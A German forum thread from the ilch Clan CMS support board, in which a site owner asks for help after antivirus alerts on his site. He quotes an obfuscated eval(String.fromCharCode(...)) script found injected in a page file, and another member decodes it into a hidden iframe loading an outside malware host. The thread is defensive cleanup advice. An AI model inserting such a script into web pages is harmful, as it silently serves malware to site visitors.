ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » Sicherheitslücke im Script

Geschlossen
  1. #1
    User Pic
    Chewbacca Mitglied
    Registriert seit
    07.02.2009
    Beiträge
    137
    Beitragswertungen
    0 Beitragspunkte
    Guten Morgen Zusammen,

    kurzes Problem ich scheine eine Sicherheitslücke auf meiner Seite zu haben, leider keine Ahnung wo diese sein könnte - Klar!:(

    Bei manchen gästen schlägt das Virenprogramm Alarm, wenn Sie meine Seite betreten und bei vielen nicht!

    User 1 Antivir 9.0 geht rauf - Alarm! HTML/Crypted.Gen

    Bei mir Mcafee und Antivir 9.0 getestet - nichts!

    Ich habe jetzt von zwei Gästen ein screneshot bekommen, wo irgendwie die seite vestelia.com angemeldet wird - Kenn ich aber nicht!

    gesperrtes Bild
    und
    gesperrtes Bild

    Als Ich mein Backup gescannt habe, hat sich Antivir bei der Home.htm gemeldet, die aber nicht benutzt wird.
    In dieser stand dann am Ende auch folgendes script drin, was ich nicht zuordnen kann!
    Die Home Datei habe ich dann gelöscht!

    ZitatZitat
    <script>eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,61,34,118,101,115,34,59,
    118,97,114,32,119,51,52,53,61,34,116,101,34,59,118,97,114,32,
    114,101,54,61,34,108,105,97,46,34,59,118,97,114,32,114,114,
    61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,
    118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,
    101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,
    114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,
    47,47,39,43,102,103,103,103,101,51,43,39,39,43,119,51,52,53,43,
    39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,
    113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,
    101,61,34,100,39,43,39,105,115,112,108,97,121,58,110,39,43,39,
    111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,
    41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>


    Kann mir jemand helfen?

    Es handelt sich um die aktuelle version 1.1 M

    Grüße

    Chewbacca


    verwendete ilchClan Version: 1.1

    betroffene Homepage: externer Link
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    Burli Mitglied
    Registriert seit
    17.06.2006
    Beiträge
    776
    Beitragswertungen
    0 Beitragspunkte
    Also mein Kaspersky Quitscht gleich los wenn ich Deine Seite Besuchen will.
    trojanisches Programm
    Trojan.JS.Agent.wh
    Hast Du in letzter zeit vielleicht was installiert???
    das es am Script selbst liegt kann nicht sein denn wenn ich andere Seiten besuch kommt es nicht.
    oder sind neue banner ect. hinzugekommen , da ja einige so schlau sind und die dahinter verstecken.

    Woran es nun wirklich liegt kann ich Dir nicht sagen aber wenn es erst seid neustem ist würd ich mir gedanken machen was ich als letztes auf der Seite geändert hab.

    MfG Burli
    Wer in einem Text von mir, einen Rechtschreibfehler findet, der darf diesen auch behalten
    leistung-durch-schmerz.de
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    Chewbacca Mitglied
    Registriert seit
    07.02.2009
    Beiträge
    137
    Beitragswertungen
    0 Beitragspunkte
    Hallo Burli,

    könntest Du vielleicht nochmal auf die Seite gehen?
    Ich habe jetzt mal die Sponsoren Banner rausgenommen!

    Grüße

    Chewbacca
    0 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    Nano.v1 Hall Of Fame
    Registriert seit
    14.02.2009
    Beiträge
    896
    Beitragswertungen
    0 Beitragspunkte
    das script ist aber interessant, irgendwo muß auch stehen welcher algo dazu verwendet wird, ich schätze base64, also das script ist gecrypted, ich würds gerne mal zurückrechnen
    Kein Support ausserhalb dieses Forum, es sei denn ich biete es selbst an, und das passiert ....?!

    Nano´s Ilch-Seite
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    Burli Mitglied
    Registriert seit
    17.06.2006
    Beiträge
    776
    Beitragswertungen
    0 Beitragspunkte
    ZitatZitat geschrieben von Chewbacca

    Hallo Burli,

    könntest Du vielleicht nochmal auf die Seite gehen?
    Ich habe jetzt mal die Sponsoren Banner rausgenommen!

    Grüße

    Chewbacca


    Gleiche Meldung wie vorher auch
    Wer in einem Text von mir, einen Rechtschreibfehler findet, der darf diesen auch behalten
    leistung-durch-schmerz.de
    0 Mitglieder finden den Beitrag gut.
  6. #6
    User Pic
    Chewbacca Mitglied
    Registriert seit
    07.02.2009
    Beiträge
    137
    Beitragswertungen
    0 Beitragspunkte
    wo steht denn, um welchen algo es sich handelt!

    Ich habe die Home mit der original home von Ilch verglichen, bei der von ILCH steht das nicht drin!

    EDIT: Ich habe mir nochmal das Design angeguckt!
    Das stand inder readme drin:
    ZitatZitat
    ° Keine bekannt, auser...

    ° Copyright-Vermerk und Hyperlink (Verlinkung) DARF NICHT ENTFERNT WERDEN!!!

    bei verändern vom Design müssen sie trotzdem bestehen bleiben.

    Das ist das Multigaming Design:loa_01 1.1

    Greets

    Chewbacca


    Zuletzt modifiziert von Chewbacca am 31.03.2009 - 14:01:51
    0 Mitglieder finden den Beitrag gut.
  7. #7
    User Pic
    Nano.v1 Hall Of Fame
    Registriert seit
    14.02.2009
    Beiträge
    896
    Beitragswertungen
    0 Beitragspunkte
    irgendwo im script, aber lösch den halt einfach raus, was zierst du dich,
    im zweifelsfall halt backup einspielen
    Kein Support ausserhalb dieses Forum, es sei denn ich biete es selbst an, und das passiert ....?!

    Nano´s Ilch-Seite
    0 Mitglieder finden den Beitrag gut.
  8. #8
    User Pic
    Burli Mitglied
    Registriert seit
    17.06.2006
    Beiträge
    776
    Beitragswertungen
    0 Beitragspunkte
    gesperrtes Bild

    So sieht es bei mir aus

    Allerdings ist bei externer Link hierzu auch noch kein Eintrag vorhanden.
    Wennst beide verglichen hast teste es doch einfach in dem du die originale mit deiner jetzigen überschreibst.
    Vorher natürlich ein Backup machen

    Aber am loa design kann es eigentlich auch nicht liegen da es einige drauf haben ohne diesen Trojaner

    MfG Burli
    Wer in einem Text von mir, einen Rechtschreibfehler findet, der darf diesen auch behalten
    leistung-durch-schmerz.de
    0 Mitglieder finden den Beitrag gut.
  9. #9
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Der Code bedeuted
    var fggge3="ves";var w345="te";var re6="lia.";var rr="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one">');var t=00001217


    und genau ist es dann ein iframe

    <iframe src="http://vestelia.com/qqp/" style="display:none">


    Überprüfe mal deine index.php da steht der Code bestimmt drin, im Design jedenfalls nicht, und dort solltest du ihn dann raus löschen, also den mit den vielen Zahlen.

    Weiter ggf. der index.php danach CHMOD 444 geben, damit sie nicht von außen geändert werden kann.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  10. #10
    User Pic
    Chewbacca Mitglied
    Registriert seit
    07.02.2009
    Beiträge
    137
    Beitragswertungen
    0 Beitragspunkte
    Hallo Leute,

    ich habe jetzt den langen text rausgenommen! Die Seite funktioniert noch!

    Den anderen Code, den mir Mairu gesagt hat habe ich noch nicht gefunden, werde aber weitersuchen!

    Greets

    Chewbacca

    Könnt ihr zwischendurch immer mal probieren und berichten?
    0 Mitglieder finden den Beitrag gut.
  11. #11
    User Pic
    Nano.v1 Hall Of Fame
    Registriert seit
    14.02.2009
    Beiträge
    896
    Beitragswertungen
    0 Beitragspunkte
    index.php das ist die php-datei neben welcher auch der ordner include liegt (also die wurzel der ilch-installation)
    Kein Support ausserhalb dieses Forum, es sei denn ich biete es selbst an, und das passiert ....?!

    Nano´s Ilch-Seite
    0 Mitglieder finden den Beitrag gut.
  12. #12
    User Pic
    Chewbacca Mitglied
    Registriert seit
    07.02.2009
    Beiträge
    137
    Beitragswertungen
    0 Beitragspunkte
    Hallo Nano,

    wo die Index.php ist weiß ich! Habe wie gesagt auch alles jetzt so gemacht wie Mairu gesagt hat!

    Es ging mir jetzt nur um die beiden Code Felder, diese Sachen finde ich nicht!

    Grüße

    Pasquale
    0 Mitglieder finden den Beitrag gut.
  13. #13
    User Pic
    Nano.v1 Hall Of Fame
    Registriert seit
    14.02.2009
    Beiträge
    896
    Beitragswertungen
    0 Beitragspunkte
    den zahlencode sollst du rausmachen, der zahlencode entspricht dem code den mairu gepostet hat, das von mairu gibt es so nicht
    Kein Support ausserhalb dieses Forum, es sei denn ich biete es selbst an, und das passiert ....?!

    Nano´s Ilch-Seite
    0 Mitglieder finden den Beitrag gut.
  14. #14
    User Pic
    Chewbacca Mitglied
    Registriert seit
    07.02.2009
    Beiträge
    137
    Beitragswertungen
    0 Beitragspunkte
    Vielen Dank an Alle!

    Von mir aus gesehen closed!

    Chewbacca
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Fehlersuche und Probleme

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten